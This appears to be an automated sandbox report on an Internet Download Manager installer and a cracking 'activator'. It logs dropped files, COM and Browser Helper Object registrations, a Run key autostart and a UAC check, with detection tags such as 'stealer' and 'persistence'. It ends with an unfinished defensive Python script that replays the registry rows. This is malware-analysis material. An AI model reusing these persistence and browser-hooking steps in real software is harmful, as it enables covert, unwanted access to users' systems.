N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\idman642build7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe N/A
N/A N/A C:\Users\Admin\Desktop\IDM 6.xx Activator or Resetter v3.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\idman642build7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMGetAll64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMShellExt64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\RUNDLL32.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\IDMan = "C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe /onboot" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\RUNDLL32.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\RUNDLL32.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\RUNDLL32.EXE N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\ = "IDM Helper" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\NoExplorer = "1" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\ = "IDM Helper" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\NoExplorer = "1" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
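Added example, not part of the sandbox report: the COM, Run key and BHO tables above are flat event lists in which the same InprocServer32 keys are created, written and deleted by two different writers (regsvr32.exe and IDMIntegrator64.exe), so the registration that actually survives has to be reconstructed by replaying the rows in order. The Python below parses rows in the report's `<op> <path>[ = "<value>"] <process> N/A` layout, replays them, and reports the final CLSID to DLL map, the BHO joined to the DLL its CLSID resolves to, the Run/RunOnce entries, and the IE Protected Mode elevation policy. The embedded sample rows are copied verbatim from this report (the three tables above plus two rows from the "Modifies Internet Explorer settings" table further down). What the output makes visible: the CLSIDs resolve to IDM's own components (the "IDM Helper" BHO {0055C089-...} is IDMIECC64.dll; {7D11E719-...} is downlWithIDM64.dll, the same CLSID later written to Internet Explorer\DownloadUI), and a legitimate IDM installation performs the same registrations, so they are context for the sample rather than unique indicators. The RunOnce\GrpConv = "grpconv -o" entry written by RUNDLL32.EXE is the standard side effect of INF processing through rundll32/advpack, not an autostart the sample controls; the HKCU Run\IDMan entry is the real autostart. An ElevationPolicy entry with Policy = 3 lets a low-integrity Protected Mode iexplore.exe launch the named program (IEMonitor.exe) at medium integrity without prompting, which is the privilege boundary an IE add-on crosses to hand work to an out-of-browser process. Assumptions: the row format above, row order treated as chronological (the report does not guarantee this, so the `live` flag is a hypothesis to confirm against the sandbox's raw timeline or the host), and the Policy code meanings taken from Microsoft's Protected Mode documentation.

```python
"""Replay this report's registry rows into a persistence summary.

Added example, not part of the sandbox output. Each row follows the report's
flattened layout:  <op> <registry path>[ = "<value>"] <writer process> N/A
"""
import json
import re

# Rows copied verbatim from this report (COM, Run key, BHO and IE Low Rights
# tables), in the order the report prints them. The replay treats that order
# as chronological, which the report does not guarantee.
ROWS = r"""
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMGetAll64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMShellExt64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\RUNDLL32.EXE N/A
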